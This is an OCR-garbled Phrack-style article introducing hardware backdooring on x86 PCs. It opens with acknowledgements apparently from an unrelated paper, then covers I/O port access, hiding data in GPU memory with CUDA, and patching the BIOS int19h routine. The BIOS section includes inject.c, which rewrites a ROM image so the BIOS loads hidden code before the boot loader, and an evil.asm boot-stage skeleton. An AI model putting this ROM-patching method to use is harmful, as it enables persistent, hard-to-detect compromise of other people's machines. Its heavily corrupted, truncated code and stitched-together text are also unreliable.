nemo@felinemenace.org. Flames to mercy@felinemenace.org 
please ;) 


Now for the thanks. A huge thankyou to my amazing fiancee pif 
for her love and support while i was writing this. 

Thanks to bk for all the help and long conversations about XNU. 
Thanks to everyone at felinemenace for all the support, code 
and fun times. Also a big thank you to my computer for not 
kernel panic()’ing for a third time during the process of 
saving this paper. I think if you had written random bytes 
over the paper a third time I wouldn’t have had the stamina 

to rewrite (again). 


Finally, this paper isn’t complete without another bad Star 
Wars pun to match the title so here we go.... 


May the fork()’s be with root... 
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1. Abstract 


Today, we’re observing a growing number of papers focusing on hardware 
hacking. Even if hardware-based backdoors are far from being a good 
solution to use in the wild, this topic is very important as some big 
corporations are planning to take control of our computers without our 
consent using some really bad designed concepts such as DRM and TCPA. 

As we can’t let them do this at any cost, the time has come for a little 
introduction to the hardware world... 


This paper constitutes a tiny introduction to hardware hacking in the 
backdoor writers perspective (hey, this is phrack, I’m not going to explain 
how to pilot your coffee machine with a RS232 interface). The thing is 
even if backdooring hardware isn’t a so good idea, it is a good way to 
start in hardware hacking. The aim of the author is to give readers th 
basis of hardware hacking which should be usefull to prepare for the fight 
against TCPA and other crappy things sponsored by big sucke... erm... 
"companies" such as Sony and Microsoft. 


This paper is i386 centric. It does not cover any other architecture, 
but it can be used as a basis on researches about other hardware. Thus 
bear in mind that most of the material presented here won’t work on any 
other machine than a PC. Subjects such as devices, BIOS and internal work 
of a PC will be discussed and some ideas about turning all these things to 
our own advantage will be presented. 


This paper IS NOT an ad nor a presentation of some 3vl1L sOfTw4r3, 

so you won’t find a fully functionnal backdoor here. The aim of the author 
is to provide information that would help you in writing your own stuff, 
not to provide you with an already done work. This subject isn’t a 
particularly difficult one, all it just takes is immagination. 


In order to understand this article, some knowledge about x86 assembly 
and architecture is heavily recommended. If you’re a newbie to these 
subjects, I strongly recommend you to read "The Art of Assembly 
Programming" (see [1]). 


2. A quick introduction to I/O system 


Before digging straight into the subject, some explanations must be 
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done. Those of you who already know how I/O works on Intel’s and what 
they’re here for might just prefer to skip to the next section. Others, 
just keep on reading. 


As this paper focuses on hardware, it would be practical to know how 
to access it. The I/O system provides such an access. As everybody knows, 
the processor (CPU) is the heart, or, more accurately, the brain of the 
computer. But the only thing it does is to compute. Basically, a CPU isn’t 
of much help without devices. Devices give data to be computed to the CPU, 
and allow it to bring back an answer to our requests. The I/O system is 
used to link most of devices to the CPU. The way processors see I/O based 
devices is quite the same as the way they see memory. In fact, all the 
processors do to communicate with devices is to read and write data 
"somewhere in memory" : the I/O system is charged to handle the next steps. 
This "somewhere in memory" is represented by an I/O port. I/O ports are 
special "addresses" that connects the CPU data bus to the device. Each I/0 
based device uses at least one I/O port, many of them using several. 
Basically, the only thing device drivers do is to manipulate I/O ports 
(well, very basically, that’s what they do, just to communicate with 
hardware). The Intel Architecture provides three main ways to manipulate 
I/O ports : memory-mapped I/0, Input/Output mapped I/O and DMA. 


memory-mapped I/O 


The memory-mapped I/O system allows to manipulate I/O ports as if they 
were basic memory. Instructions such as /mov’ are used to interface with 
it. This system is simple : all it does is to map I/O ports to memory 
addresses so that when data is written/read at one of these addresses, th 
data is actually sent to/received by the device connected to the 
corresponding port. Thus, the way to communicate with a device is the same 
as communicating with memory. 


Input/Output mapped I/0 


The Input/Output mapped I/O system uses dedicated CPU instructions to 
access I/O ports. On i386, these instructions are ’in’ and ‘out’ 


in 254, reg ; writes content of reg register to port #254 


out reg, 254 ; reads data from port #254 and stores it in reg 


The only problem with these two instructions is that the port is 
8 bit-encoded, allowing only an access to ports 0 to 255. The sad thing is 
that this range of ports is often connected to internal hardware such as 
the system clock. The way to circomvent it is the following (taken from 
"The Art of Assembly Programming, see [1]) 


To access I/O ports at addresses beyond 255 you must load the 16-bit I/0 
address into the DX register and use DX as a pointer to the specified I/O 
address. For example, to write a byte to the I/O address $378 you would use 
an instruction sequence like the following: 


mov $378, dx 
out al, dx 


DMA 


DMA stands for Direct Memory Access. The DMA system is used to enhanc 
devices to memory performances. Back in the old days, most hardware made 
use of the CPU to transfer data to and from memory. When computers started 
to become "multimedia" (a term as meaningless as "people ready" but really 
good looking in "we-are-trying-to-fuck-you-deep-in-the-ass ads"), that is 
when computers started to come equiped with CD-ROM and sound cards, CPU 
couldn’t handle tasks such as playing music while displaying a shotgun 
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firing at a monster because the user just has hit the /’/CTRL’ key. So, 
constructors created a new chip to be able to carry out such things, and so 
was born the DMA controller. DMA allows devices to transfer data from and 
to memory with little operations done by the CPU. Basically, all the CPU 
does is to initiate the DMA transfer and then the DMA chip takes care of 
the rest, allowing the CPU to focus on other tasks. The very interesting 
thing is that since the CPU doesn’t actually do the transfer and since 
devices are being used, protected mode does not interfere, which means we 
can write and read (almost) anywhere we would like to. This idea is far 
from being new, and PHC already evoqued it in one of their phrack parody. 


DMA is really a powerfull system. It allows us to do very cool 
tricks but this come as the expense of a great prize : DMA is a pain in 
the ass to use as it is very hardware specific. Here follows the main 
different kinds of DMA systems 


—- DMA Controller (third-party DMA) : this DMA system is really old 
and inefficient. The idea here is to have a general DMA Controller on the 
motherboard that will handle every DMA operations for every devices. This 
controller was mainly used with ISA devices and its use is now deprecated 
because of performance issues and because only 4 to 8 (depending if the 
board had two cascading DMA Controllers) DMA transfers could be setup at 
the same time (the DMA Controller only provides 4 channels). 


—- DMA Bus mastering (first-party DMA) : this DMA system provides 
far better performances than the DMA Controller. The idea is to allow 
each device to manage DMA himself by a processus known as "Bus Mastering". 
Instead of relying on the general DMA Controller, each device is able to 
take control of the system bus to perform its transfers, allowing hardware 
manufacturers to provide an efficient system for their devices. 


These three things are practical enough to get started but modern 
operating systems provides medias to access I/O too. As there are a lot of 
these systems on the computer market, I’11l introduce only the GNU/Linux 
system, which constitutes a perfect system to discover hardware hacking on 
Intel. As many systems, Linux is run in two modes : user land and kernel 
land. Since Kernel land already allows a good control on the system, let’s 
see the user land ways to access I/O. I’1l explain here two basic ways to 
play with hardware : in*(), out*() and /dev/port 


in/out 


The in and out instructions can be used on Linux in user land. Equally, 
the functions outbh(2), outw(2), outl(2), inb(2), inw(2), inl(2) are 
provided to play with I/O and can be called from kernel land or user land. 


As stated in "Linux Device Drivers" (see [2]), their use is the following 
unsigned inb(unsigned port); 
void outb(unsigned char byte, unsigned port); 

Read or write byte ports (eight bits wide). The port argument is defined as 


unsigned long for some platforms and unsigned short for others. The return 
type of inb is also different across architectures. 


unsigned inw(unsigned port); 
void outw(unsigned short word, unsigned port); 


These functions access 16-bit ports (word wide); they are not available 
when compiling for the M68k and S390 platforms, which support only byte 
I/O. 


unsigned inl(unsigned port); 
void outl (unsigned longword, unsigned port); 


These functions access 32-bit ports. longword is either declared as 
unsigned long or unsigned int, according to the platform. Like word I/O, 
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Note that no 64-bit port I/O operations are defined. Even on 64-bit 
architectures, the port address space uses a 32-bit (maximum) data path. 


The only restriction to access I/O ports this way from user land is 
that you must use iopl(2) or ioperm(2) functions, which sometimes are 
protected by security systems like grsec. And of course, you must be root. 
Here is a sample code using this way to access I/O 


aan [io.c 

/* 

** Just a simple code to s how to play with inb()/outb() functions. 
kk 


** usage is 


ty * read : io r <port address> 
calc * write : 10 w <port address> <value> 
xk* 


** compile with : gcc io.c -o io 


include <stdio.h> 
include <string.h> 
include <stdlib.h> 
include <sys/io.h> /* iopl(2) inb(2) outb(2) */ 


void read_io(long port) 
{ 


unsigned int val; 


val = inb(port); 
fprintf(stdout, "value : %X\n", val); 
} 
void write_io(long port, long value) 


{ 
outb(value, port); 


} 


int main(int argc, char **argv) 
{ 
long port; 


if (arge < 3) 
{ 
fprintf(stderr, "usage is : io <r|w> <port> [value]\n"); 
exit(1); 
} 
port = atoi(argv[2]); 
if (iopl(3) == -1) 
{ 


fprintf(stderr, "could not get permissions to I/O system\n"); 


exit(1); 
} 
if ('stremp(argv[1], "r")) 
read_io(port); 
else if (!stremp(argv[1], "w")) 
write_io(port, atoi(argv[3])); 
else 
{ 
fprintf(stderr, "usage is : io <r|w> <port> [value]\n"); 
exit (1); 


} 


return 0; 
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/dev/port 


/dev/port is a special file that allows you to access I/O as if you 
were manipulating a simple file. The use of the functions open(2), read(2), 
write(2), lseek(2) and close(2) allows manipulation of /dev/port. Just go 
to the address corresponding to the port with lseek() and read() or write() 
to the hardware. Here is a sample code to do it 


maa [port.c 

/* 

xx Just a simple code to s how to play with /dev/port 
xk* 


** usage is 


cies * read : port r <port address> 
a. * write : port w <port address> <value> 
xk* 


** compile with : gcc port.c -o port 


include <stdio.h> 
include <string.h> 
include <stdlib.h> 
include <sys/types.h> 
include <sys/stat.h> 
include <fcntl.h> 


void read_port (int fd, long port) 
{ 


unsigned int val = 0; 


lseek(fd, port, SEEK_SET); 
read(fd, &val, sizeof(char)); 


fprintf(stdout, "value : %X\n", val); 
} 
void write_port (int fd, long port, long value) 


{ 
lseek(fd, port, SEEK_SET); 
write(fd, &value, sizeof(char)); 


} 


int main(int argc, char **argv) 
{ 

int fd; 

long port; 


if (arge < 3) 
{ 


fprintf(stderr, "usage is : io <r|w> <port> [value]\n"); 
exit(1); 
} 
port = atoi(argv[2]); 
if ((fd = open("/dev/port", O_RDWR)) == -1) 


{ 
fprintf(stderr, "could not open /dev/port\n") ; 
exit(1); 
} 
if ('stremp(argv[1l], "r")) 
read_port (fd, port); 
else if (!stremp(argv[1], "w")) 
write_port (fd, port, atoi(argv[3])); 
else 


{ 
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fprintf(stderr, "usage is : io <r|w> <port> [value] \n") 
exit(1); 


return 0; 


Ok, one last thing before closing this introduction : for Linux users 
who want to list the I/O Ports on their system, just do a 
"cat /proc/ioports", ie: 


S$ cat poroe/ToRerts # lists ports from 0000 to FFFF 
O0000-O01f : dmal 

0020-0021 : picl 
0040-0043 : timer0O 
0050-0053 : timerl 
0060-O006f : keyboard 
O0080-O008f : dma page reg 
00a0-O00al : pic2 
O00c0O-OO0df : dma2 
OOf0-O0ff : fpu 

0170-0177 : idel 

01f0-01f7 : ideOd 

0213-0213 : ISAPnP 
O2f8-O02ff : serial 
0376-0376 : idel 
0378-037a : parporto 
0388-0389 : OPL2/3 (left) 
038a-038b : OPL2/3 (right) 


03c0-O03df vgat 
O3f6-O03f6 ideo 
O3f8-O03ff serial 
0534-0537 CS4231 
0a79-0a79 isapnp write 
Ocf8-Ocff PCI confl 
b800-b8ff : 0000:00:0d.0 
b800-b8ff : 8139to0o 
dooo0-do0ff : 0000:00:09.0 
d000-do0ff 8139to0o 
d400-d41f : 0000:00:04.2 
d400-d41f : uhci_hcd 
d800-d8s0f : 0000:00:04.1 
d800-d807 ideo 
d808-d80f idel 
e400-e43f£ : 0000:00:04.3 
e400-e43f : motherboard 


e400-e403 : PMla_EVT_BLK 
e404-e405 : PMla_CNT_BLK 
e408-e40b : PM_TMR 
e40c-e40f : GPEO_BLK 
e410-e415 ACPI CPU throttle 
e800-e8l1f : 0000: 00:04.3 
e800-e80f : motherboard 
e800-e80f : pnp 00:02 


3. Playing with GPU 


3D cards are just GREAT, period. When you’re installing such a card in 
your computer, you’re not just plugging a device that can render nice 
graphics, you’re also putting a mini-computer in your own computer. Today’s 
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graphical cards aren’t a simple chip anymore. They have memory, they have a 
processor, they even have a BIOS ! You can enjoy a LOT of features from 


these little things. 


First of all, let’s consider what a 3D card really is. 3D cards are 
here to enhance your computer performances rendering 3D and to send output 
for your screen to display. As I said, there are thr parts that interest 
us in our 3vl1L doings 


1/ The Video RAM. It is memory embedded on the card. This memory is 
used to store the scene to be rendered and to store computed results. Most 
of today’s cards come with more than 256 MB of memory, which provide us a 
nice place to store our stuff. 


2/ The Graphical Processing Unit (shortly GPU). It constitutes the 
processor of your 3D card. Most of 3D operations are maths, so most of the 
GPU instructions compute maths designed to graphics. 


3/ The BIOS. A lot of devices include today their own BIOS. 3D cards 
make no exception, and their little BIOS can be very interesting as they 
contain the firmware of your 3D card, and when you access a firmware, well, 
you can just nearly do anything you dream to do. 


I’1ll give ideas about what we can do with these thr lements, but 
first we need to know how to play with the card. Sadly, as to play with any 
device in your computer, you need the specs of your material and most 3D 
cards are not open enough to do whatever we want. But this is not a big 
problem in itself as we can use a simple API which will talk with the card 
for us. Of course, this prevents us to use tricks on the card in certain 
conditions, like in a shellcode, but once you’ve gained root and can do 
what pleases you to do on the system it isn’t an issue anymore. The API I’m 
talking about is OpenGL (see [3]), and if you’re not already familiar with 
it, I suggest you to read the tutorials on [4]. OpenGL is a 3D programming 
API defined by the OpenGL Architecture Review Board which is composed of 
members from many of the industry’s leading graphics vendors. This library 
often comes with your drivers and by using it, you can develop easily 
portable code that will use features of the present 3D card. 


As we now know how to communicate with the card, let’s take a deeper 
look at this hardware piece. GPU are used to transform a 3D environment 
(the "scene") given by the programmer into a 2D image (your screen). 
Basically, a GPU is a computing pipeline applying various mathematical 
operations on data. I won’t introduce here the complete process of 
transforming a 3D scene into a 2D display as it is not the point of this 
paper. In our case, all you have to know is 


1/ The GPU is used to transform input (usually a 3D scene but nothing 
prevents us from inputing anything else) 


2/ These transformations are done using mathematical operations commonly 
used in graphical programming (and again nothing prevents us from using 
those operations for another purpose) 


3/ The pipeline is composed of two main computations each involving 
multiple steps of data transformation 


— Transformation and Lighting : this step translates 3D objects 
into 2D nets of polygons (usually triangles), generating a 
wireframe rendering. 


— Rasterization : this step takes the wireframe rendering as input 
data and computes pixels values to be displayed on the screen. 


So now, let’s take a look at what we can do with all these features. 
What interests us here is to hide data where it would be hard to find it 
and to execute instructions outside the processor of the computer. I won’t 
talk about patching 3D cards firmware as it requires heavy revers 
engineering and as it is very specific for each card, which is not the 
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First, let’s consider instructions execution. Of course, as we are 
playing with a 3D card, we can’t do everything we can do with a computer 
processor like triggering software interrupts, issuing I/O operations or 
manipulating memory, but we can do lots of mathematical operations. For 

xample, we can encrypt and decrypt data with the 3D card’s processor 
which can render the revers ngineering task quite painful. Also, it can 
speed up programs relying on heavy mathematical operations by letting the 
computer processor do other things while the 3D card computes for him. Such 
things have already been widely done. In fact, some people are already 


having fun using GPU for various purposes (see [5]). The idea here is to 
use the GPU to transform data we feed him with. GPUs provide a system to 
program them called "shaders". You can think of shaders as a programmable 


hook within the GPU which allows you to add your own routines in the data 
transformation processus. These hooks can be triggered in two places of the 
computing pipeline, depending on the shader you’re using. Traditionnaly, 
shaders are used by programmers to add special effects on the rendering 
process and as the rendering process is composed of two steps, the GPU 
provides two programmable shaders. The first shader is called the 

"Vexter shader". This shader is used during the transformation and lighting 
step. The second shader is called the "Pixel shader" and this one is used 
during the rasterization processus. 


Ok, so now we have two entry points in the GPU system, but this 
doesn’t tell us how to develop and inject our own routines. Again, as we 
are playing in the hardware world, there are several ways to do it, 
depending on the hardware and the system you’re running on. Shaders use 
their own programming languages, some are low level assembly-lik 
languages, some others are high level C-like languages. The thr main 
languages used today are high level ones 


—- High-Level Shader Language (HLSL) : this language is provided by 
Microsoft’s DirectX API, so you need MS Windows to use it. (see [6]) 
- OpenGL Shading Language (GLSL or GLSlang) : this language is 


provided by the OpenGL API. (see [7]) 


- Cg : this language was introduced by NVIDIA to program on their 
hardware using either the DirectX API or the OpenGL one. Cg comes 
with a full toolkit distributed by NVIDIA for free (see [8] and [9]). 


Now that we know how to program GPUs, let’s consider the most 
interesting part : data hiding. As I said, 3D cards come with a nice 
amount of memory. Of course, this memory is aimed at graphical usage but 
nothing prevents us to store some stuff in it. In fact, with the help of 
shaders we can even ask the 3D card to store and encrypt our data. This is 
fairly easy to do : we put the data in the beginning of the pipeline, w 
p 
r 
iS 
i 


rogram the shaders to decide how to store and encrypt it and we’re done. 
hen, retrieving this data is nearly the same operation : we ask the 

haders to decrypt it and to send it back to us. Note that this encryption 
s really weak, as we rely only on shaders’ computing and as the encryption 
and decryption process can be reversed by simply looking at the shaders 
programming in your code, but this can constitutes an effective way to 
improve already existing tricks (a 3D card based Shiva could be fun). 


Ok, so now we can start coding stuff taking advantage of our 3D cards. 
But wait ! We don’t want to mess with shaders, we don’t want to learn 
about 3D programming, we just want to execute code on the device so we can 
quickly test what we can do with those devices. Learning shaders 
programming is important because it allows to understand the device better 
but it can be really long for people unfamiliar with the 3D world. 
Recently, nVIDIA released a SDK allowing programmers to easily use 3D 
devices for other purposes than graphisms. nVIDIA CUDA (see [10]) is a SDK 
allowing programmers to use the C language with new keywords used to tell 
the compiler which part of the code should be executed on the device and 
which part of the code should be executed on the CPU. CUDA also comes with 
various mathematical libraries. 
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Here is a funny code to illustrate the use of CUDA 


/* 
** 3ddb.c : a very simple program used to store an array in 
**x GPU memory and make the GPU "encrypt" it. Compile it using nvcc. 


*/ 


include <stdio.h> 
include <string.h> 
#include <stdlib.h> 


include <cutil.h> 
include <cuda.h> 


/*** GPU code and data ***/ 


char * store; 


__global__ void encrypt (int key) 
{ 


/* do any encryption you want here */ 


/* and put the result into ’store’ */ 
/* (you need to modify CPU code if */ 
/* the encrypted text size is * / 
/* different than the clear text wy 
/* one). */ 

} 

/*** end of GPU code and data ***/ 

/*** CPU code and data ***/ 


CUdevice dev; 
void usage(char * cmd) 
{ 
fprintf(stderr, "usage is : %s <string> <key>\n", cmd); 
exit (0); 
} 
void init_gpu () 
{ 
int count; 
CUT_CHECK_DEVICE () ; 


CU_SAFE_CALL(cuInit()); 
CU_SAFE_CALL (cuDeviceGetCount (&count) ); 
if (count <= 0) 


{ 


fprintf(stderr, "error : could not connect to any 3D card\n"); 
exit (-1); 
} 
CU_SAFE_CALL (cuDeviceGet (&dev, 0)); 
CU_SAFE_CALL (cuCtxCreate (dev) ); 
} 
int main(int argc, char ** argv) 
{ 
int key; 


char * res; 
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if (arge != 3) 
usage (argv[0]); 
init_gpu(); 
CUDA_SAFE_CALL(cudaMalloc((void **)&store, strlen(argv[1]))); 
CUDA_SAFE_CALL (cudaMemcpy (store, 


argv[l], 
strlen(argv[1l]), 
cudaMemcpyHostToDevice) ); 
res = malloc(strlen(argv[1])); 
key = atoi(argv[2]); 
encrypt<<<128, 256>>> (key); 
CUDA_SAFE_CALL (cudaMemcpy (res, 
store, 
strlen(argv[1l]), 
cudaMemcpyDeviceToHost) ); 
for (i = 0; i < strlen(argv[1]); i++) 
printf ("sc", res[i]); 
CU_SAFE_CALL(cuCtxDetach()); 
CUT_EXIT(argc, argv); 
return 0; 


4. Playing with BIOS 


BIOSes are very interesting. In fact, little work has already been 
done in this area and some stuff has already been published. But let’s 
recap all this things and take a look at what wonderful tricks we can do 
with this little chip. First of all, BIOS means Basic Input/Output System. 
This chip is in charge of handling boot process, low-level configuration 
and of providing a set of functions for boot loaders and operating systems 
during their early loading processus. In fact, at boot time, BIOS takes 
control of the system first, then it does a couple of checks, then it sets 
an IDT to provide features via interruptions and finally tries to load the 
boot loader located in each bootable device, following its configuration. 
For example, if you specify in your BIOS setup to first try to boot on 
optical drive and then on your harddrive, at boot time the BIOS will first 
try to run an OS from the CD, then from your harddrive. BIOSes’ code is the 
VERY FIRST code to b xecuted on your system. The interesting thing is 
that backdooring it virtually gives us a deep control of the system anda 
practical way to bypass nearly any security system running on the target, 
since w xecute cod ven before this system starts ! But the inconvenient 
of this thing is big : as we are playing with hardware, portability becomes 
a really big issue. 


The first thing you need to know about playing with BIOS is that there 
are several ways to do it. Some really good publications (see [11]) have 
been made on the subject, but I’1l1 focus on what we can do when patching 
the ROM containing the BIOS. 


BIOSes are stored in a chip located on your motherboard. Old BlOSes 
were single ROMs without write possibilities, but then some manufacturers 
got the brilliant idea to allow BIOS patching. They introduced the BIOS 
flasher, which is a little device we can communicate with using the I/O 
system. The flasher can read and write the BIOS for us, which is all we 
need to play in this land. Of course, as there are many different BlIOSes 
in the wild, I won’t introduce any particular chip. Here are some pointers 
that will help you 


* [12] /dev/bios is a tool from the OpenBIOS initiative (see [13]). 
It is a kernel module for Linux that creates devices to easily manipulate 
various BIOSes. It can access several BIOSes, including network card 
BIOSes. It is a nice tool to play with and the code is nice, so you’ll see 
how to get your hands to work. 
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* [14] is a WONDERFUL guide that will explain you nearly everything 
about Award BIOSes. This paper is a must read for anyone interested in this 
subject, even if you don’t own an Award BIOS. 


* [15] is an interesting website to find information about various 
BlOSes. 


In order to start easy and fast, we’ll use a virtual machine, which 
is very handy to test your concepts before you waste your BIOS. I 
recommend you to use Bochs (see [16]) as it is free and open source and 
mainly because it comes with a very well commented source code used to 
emulate a BIOS. But first, let’s see how BIOSes really work. 


As I said, BIOS is the first entity which has the control over your 
system at boottime. The interesting thing is, in order to start to reverse 
engineer your BIOS, that you don’t even need to use the flasher. At the 
start of the boot process, BIOS’s code is mapped (or "Shadowed") in RAM at 
a specific location and uses a specific range of memory. All we have to do 
to read this code, which is 16 bits assembly, is to read memory. BIOS 
memory area starts at Oxf0000 and ends at 0x100000. An easy way to dump 
the code is to simply do a 


% dd if=/dev/mem of=BIOS.dump bs=1 count=65536 seek=983040 
% objdump -b binary -m i8086 -D BIOS.dump 


You should note that as BIOS contains data, such a dump isn’t accurate 
as you will have a shift preventing code to be disassembled correctly. To 
address this problem, you should use the entry points table provided 
farther and use objdump with the ’--start-address’ option. 


Of course, the code you see in memory is rarely easy to retrieve in 
the chip, but the fact you got the somewhat "unencrypted text" can help a 
lot. To get started to see what is interesting in this code, let’s have a 
look at a very interesting comment in the Bochs BIOS source code 
(from [17]) 


30 // ROM BIOS compatability entry points: 


32 // Se05b ; POST Entry Point 

33 // Se2c3 ; NMI Handler Entry Point 

34 // Se3fe ; INT 13h Fixed Disk Services Entry Point 

35 // Se401 ; Fixed Disk Parameter Table 

36 // Se6f2 ; INT 19h Boot Load Service Entry Point 

37 // Se6£5 ; Configuration Data Table 

38 // Se729 ; Baud Rate Generator Table 

39 // Se739 ; INT 14h Serial Communications Service Entry Point 
40 // Se82e ; INT 16h Keyboard Service Entry Point 

41 // Se987 ; INT 09h Keyboard Service Entry Point 

42 // Sec59 ; INT 13h Diskette Service Entry Point 

43 // Sef57 ; INT OEh Diskette Hardware ISR Entry Point 

44 // Sefc7 ; Diskette Controller Parameter Table 

45 // Sefd2 ; INT 17h Printer Service Entry Point 

46 // $£045 ; INT 10 Functions 0-Fh Entry Point 

47 // S£065 ; INT 10h Video Support Service Entry Point 

48 // S£0a4 ; MDA/CGA Video Parameter Table (INT 1Dh) 

49 // S£841 ; INT 12h Memory Size Service Entry Point 

50 // Sf£84d ; INT 11h Equipment List Service Entry Point 

51 // S$£859 ; INT 15h System Services Entry Point 

52 // Sfa6e ; Character Font for 320x200 & 640x200 Graphics \ 
(lower 128 characters) 

53 // Sfe6e ; INT 1Ah Time-of-day Service Entry Point 

54 // Sfea5 ; INT 08h System Timer ISR Entry Point 

55 // Sfef3 ; Initial Interrupt Vector Offsets Loaded by POST 
56 // Sf£53 ; IRET Instruction for Dummy Interrupt Handler 

57 // Sf££54 ; INT O5h Print Screen Service Entry Point 

58 // Sfff0 ; Power-up Entry Point 
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59 // Sff££5 ; ASCII Date ROM was built - 8 characters in MM/DD/YY 
60 // $f€ffe ; System Model ID 

These offsets indicate where to find specific BIOS 

functionalities in memory and, as they are standard, you can apply them to 
your BIOS too. For example, the BIOS interruption 19h is located in memory 
at Oxfe6f2 and its job is to load the boot loader in RAM and to jump on it. 
On old systems, a little trick was to jump to this memory location to 
reboot the system. But before considering BIOS code modification, we have 
one issue to resolve : BIOS chips have limited space, and if it can 

provide enough space for basic backdoors, we’ll end up quickly begging for 
more places to store code if we want to do something nice. We have two ways 
to get more spac 


1/ We patch the int19h code so that instead of loading the real 
bootloader on a device specified, it loads our code (which will load the 
real bootloader once it’s done) at a specific location, like a sector 
marked as defective on a specific hard drive. Of course, this operation 
implies alteration of another media than BIOS, but, since it provides us 
with as nearly as many space as we could dream, this method must be taken 
into consideration 


2/ If you absolutely want to stay in BIOS space, you can do a little 
trick on some BIOS models. One day, processors manufacturers made a deal 
with BIOS manufacturers. Processor manufacturers decided to give the 
possibility to update the CPU’s microcode in order to fix bugs without 
having to recall all sold material (remember the f00f bug ?). The idea was 
that the BIOS would store the updated microcode and inject it in the CPU 
during each boot process, as modifications on microcode aren’t permanent. 
This feature is known as "BIOS update". Of course, this microcode takes 
space and we can search for the code injecting it, hook it so it doesn’t do 
anything anymore and erase the microcode to store our own code. 


Implementing 2/ is more complex than 1/, so we’ll focus on the 
first one to get started. The idea is to make the BIOS load our own code 
before the bootloader. This is very easy to do. Again, BochsBIOS sources 
will come in handy, but if you look at your BIOS dump, you should see very 
little differences. The code which interests us is located at Oxfe6f2 and 
is the 19h BIOS interrupt. This one is very interesting as this is the one 
in charge of loading the boot loader. Let’s take a look at the interesting 
part of its code 


7238 // We have to boot from harddisk or floppy 


7239 if (bootcd == 0) { 

7240 bootseg=0x07c0; 

7241 

7242 ASM _ START 

7243 push bp 

7244 mov bp, sp 

7245 

7246 mov ax, #0x0000 

7247 mov _int19_function.status + 2[bp], ax 
7248 mov dl, _int19_function.bootdrv + 2[bp] 
7249 mov ax, _int19_function.bootseg + 2[bp] 
7250 mov eS, ax 7; segment 

7251 mov bx, 0x0000 ;; offset 

7252 mov ah, 0x02 ;; function 2, read diskette sector 
7253 mov al, 0x01 ;; vead 1 sector 
7254 mov ch, 0x00 7; track 0 

7255 mov cl, 0x01 ;; sector 1 

7256 mov dh, 0x00 7; head 0 

7257 int #0x13 ;; read sector 

7258 jnce intl19_load_done 

7259 mov ax, 0x0001 

7260 mov int19_function.status + 2[bp], ax 
7261 


7262 int19_load_done: 
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7263 pop bp 
7264 ASM_END 


int1l3h is the BIOS interruption used to access storage devices. In 
our case, BIOS is trying to load the boot loader, which is on the first 
sector of the drive. The interesting thing is that by only changing the 
value put in one register, we can make the BIOS load our own code. For 
instance, if we hide our code in the sector number OxN and if we patch the 
BIOS so that instead of the instruction ’mov cl, #0x01’ we have 
"mov cl, #0xN’, we can have our code loaded at each boot and reboot. 
Basically, we can store our code wherever we want to as we can change the 
sector, the track and even the drive to be used. It is up to you to chose 
where to store your code but as I said, a sector marked as defective can 
work out as an interesting trick. 


Here are thr source codes to help you get started faster : the 
first one, inject.c, modifies the ROM of the BIOS so that it loads our code 
before the boot loader. inject.c needs /dev/bios to run. The second one, 
code.asm, is a skeletton to fill with your own code and is loaded by the 
BIOS. The third one, store.c, inject code.asm in the target sector of the 
first track of the hard drive. 


—=[ TWEE CE.AG 


define _GNU_SOURC 


GJ 


include <stdio.h> 
include <string.h> 
include <stdlib.h> 
include <unistd.h> 
include <fcntl.h> 


define BUFSIZE 5A? 
define BIOS _DEV "/dev/bios" 
define CODE "\xbb\x00\x00" /* mov bx, 0 */ \ 
"\xb4\x02" /* mov ah, 2 */ \ 
"\xb0\x01" /* mov al, 1 */ \ 
"\xb5\x00" /* mov ch, 0 */ \ 
"\xb6\x00" /* mov dh, O */ \ 
"\xb1\x01" /* mov cl, 1 */ \ 
 W\xcd\x13" /* int 0x13 */ 
define TO_PATCH "\xcd\x13" /* mov cl, 1 */ 
define SECTOR_OFFSET Ii 
void usage(char *cmd) 
{ 
fprintf(stderr, "usage is : %s [bios rom] <sector> <infected rom>\n", cmd); 
exit(l1); 
} 
/* 


** This function looks in the BIOS rom and search the int19h procedure. 
** The algorithm used sucks, as it does only a naive search. Interested 
** readers should change it. 
*/ 
char * search(char * buf, size_t size) 
{ 

return memmem(buf, size, CODE, sizeof (COD 


} 


Gl 
~~ 
~~ 
~ 
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void patch(char * tgt, size_t size, 
{ 

char new; 

char * tmp; 

tmp = memmem(tgt, size, TO_PATCH, 

new = (char) sector; 

tmp [SECTOR_OFFSET] = new; 


14 


int sector) 


sizeof (TO_PATCH) ); 


int main(int argc, char **argv) 
{ 
int sector; 
size_t a 
size t ret; 
size t ent; 
int devfd; 
int outfd; 
char * buf; 
char * dev; 
char * out; 
char * tgt; 
if (argc == 3) 
{ 
dev = BIOS_DEV; 
out = argv[2]; 
sector = atoi(argv[1]); 
} 
else if (argc == 4) 
{ 
dev = argv[1]; 
out = argv[3]; 
sector = atoi(argv[2]); 
} 
else 
usage (argv[0]); 
if ((devfd = open(dev, O_RDONLY)) == -1) 
{ 
fprintf(stderr, "could not open BIOS\n"); 
exit(1); 
} 
if ((outfd = open(out, O_WRONLY | O_TRUNC | O_CREAT)) == -1) 
{ 
fprintf(stderr, "could not open %s\n", out); 
exit(1); 
} 
for (cnt = 0; (ret = read(devfd, buf, BUFSIZE)) > 0; cnt += ret) 
buf = realloc(buf, ((cnt + ret) / BUFSIZE + 1) * BUFSIZE); 
if (ret == -1) 
{ 
fprintf(stderr, "error reading BIOS\n"); 
exit(1); 
} 
if ((tgt = search(buf, cnt)) == NULL) 
{ 
fprintf(stderr, "could not find code to patch\n"); 
exit(1); 
} 
patch(tgt, cnt, sector); 
for (i = 0; (ret = write(outfd, buf + i, cnt - i)) > O; i += ret) 
, 
if (ret == -1) 


{ 
fprintf(stderr, 
exit(1); 


"Could not write patched ROM to disk\n"); 
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close (devfd); 
close (outfd); 
free (buf); 
return 0; 


--[ evil.asm 


77; A sample code to be loaded by an infected BIOS instead of 
i7;7 the real bootloader. It basically moves himself so he can 
77; load the real bootloader and jump on it. Replace the nops 
;7; 1£ you want him to do something usefull. 


;77 usage is 


ie no usage, this code must be loaded by store.c 
rire 

77; compile with : nasm -fbin evil.asm -o evil.bin 

rire 

BITS 16 

ORG 0 


7; we need this label so we can check the code siz 
entry: 


jmp begin ; Jump over data 


;; here comes data 
drive db 0 ; Gdrive we’re working on 


begin: 


mov [drive], dl ; get the drive we’re working on 


; segments init 


a 

mov ax, 0x07CO 
mov ds, ax 

mov es, ax 

7; stack init 

mov ax, 0 

mov SS, ax 

mov ax, Oxffff 
mov Sp, ax 


a 


; move out of the zone so we can load the TRUE boot loader 


, 

mov ax, Ox7c0 
mov ds, ax 
mov ax, 0Ox100 
mov es, ax 
mov si, 0 

mov di, 0 

mov cx, O0x200 
cld 

rep movsb 


7; jump to our new location 
